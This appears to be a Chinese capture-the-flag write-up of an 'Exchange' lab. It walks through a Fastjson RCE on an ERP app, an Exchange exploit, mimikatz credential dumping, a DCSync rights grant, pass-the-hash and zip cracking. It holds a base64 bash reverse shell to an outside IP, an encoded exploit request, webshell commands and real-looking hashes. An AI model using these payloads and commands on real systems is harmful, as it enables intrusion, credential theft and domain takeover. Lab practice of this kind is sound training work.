好久没水文章了,摸一下云镜QwQ

Exchange

靶标介绍:

Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。

入口:

nmap扫描,8000端口华夏erp,可任意注册账号,fastjson来RCE,复现文章

Fastjson高版本的奇技淫巧 - Bmth (bmth666.cn)

相关工具:

fnmsd/MySQL_Fake_Server: MySQL Fake Server use to help MySQL Client File Reading and JDBC Client Java Deserialize (github.com)

直接启动即可

配置文件:

{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections6":["CommonsCollections6","bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzExNy42Mi4yMDUuMTIwLzEyMzQ1IDA+JjE=}|{base64,-d}|{bash,-i}"]
    }
}

Payload:

GET /depotHead/list?search=%7b%20%22%6e%61%6d%65%22%3a%20%7b%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%31%31%37%2e%36%32%2e%32%30%35%2e%31%32%30%22%2c%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%20%22%69%6e%66%6f%22%3a%20%7b%20%22%75%73%65%72%22%3a%20%22%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%22%2c%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%20%7d%20%7d&currentPage=1&pageSize=15 HTTP/1.1
Host: 47.92.219.162:8000
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://47.92.219.162:8000/pages/bill/purchase_orders_list.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AEF939D07CEDA9F23EE5E01B4E60592D; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1679730954; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1679731297
Connection: close

最后连接命令执行代码,拿第一个flag

内网探测结果:

172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.12:8000 open
172.22.3.2:88 open
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.26:139 open
172.22.3.2:139 open
172.22.3.9:135 open
172.22.3.9:8172 open
172.22.3.9:443 open
172.22.3.9:139 open
172.22.3.9:808 open
172.22.3.2:135 open
172.22.3.26:135 open
[*] WebTitle:http://172.22.3.12        code:200 len:19813  title:lumia
[+] NetInfo:
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[+] NetInfo:
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] 172.22.3.26          XIAORANG\XIAORANG-PC       
[+] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)
[*] 172.22.3.2     [+]DC XIAORANG\XIAORANG-WIN16    Windows Server 2016 Datacenter 14393
[*] 172.22.3.9           XIAORANG\XIAORANG-EXC01    Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle:http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] WebTitle:http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle:https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle:http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle:https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle:https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook

exchange然后打exprolog:

https://github.com/herwonowr/exprolog.git

proxychains4 python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

然后任意代码执行,加用户

proxychains4 curl --request POST --url https://172.22.3.9/owa/auth/vj5gm.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd").stdout.readall())' -k

net user test test@123 /add

net localgroup administrators test /add

登陆上拿第二个flag

登录上去后mimikatz查看凭证信息:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" "exit" > 1.txt

给zhangtong增加dcsync权限:

python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -action write -rights DCSync -principal Zhangtong -target-dn 'DC=xiaorang,DC=lab' -dc-ip=172.22.3.2

mimikatz转移账户:

sekurlsa::pth /user:Zhangtong /domain:XIAORANG /ntlm:22c7f81993e96ac83ac2f3f1903de8b4

打dcsync:

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit" > 12.txt

继续哈希传递打:

proxychains4 psexec.py administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -codec gbk

or

proxychains4 crackmapexec smb 172.22.3.2 -u Administrator -H 7acbc09a6c0efd81bfa7d5a1d4238beb -d xiaorang.lab -x "type C:\\Users\\Administrator\\flag\\flag.txt"

得到第四个flag

smb登录邮箱服务器:

proxychains4 smbclient.py xiaorang.lab/administrator@172.22.3.26 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2

发现存在secret.zip在Lumia这

PTH_exchange拿邮件https://github.com/Jumbo-WJB/PTH_Exchange.git

proxychains4 python3 pthexchange.py --target https://172.22.3.9 --username "Lumia" --password "00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296" --action Download

下载邮件和附件,里面有一封邮件说zip的加密是你的手机号,以及一份手机的list直接爆破即可

zip2john item-0-secret.zip > 1.sec
john 1.sec --format=pkzip --wordlist=1.txt

打开docx得到第三个flag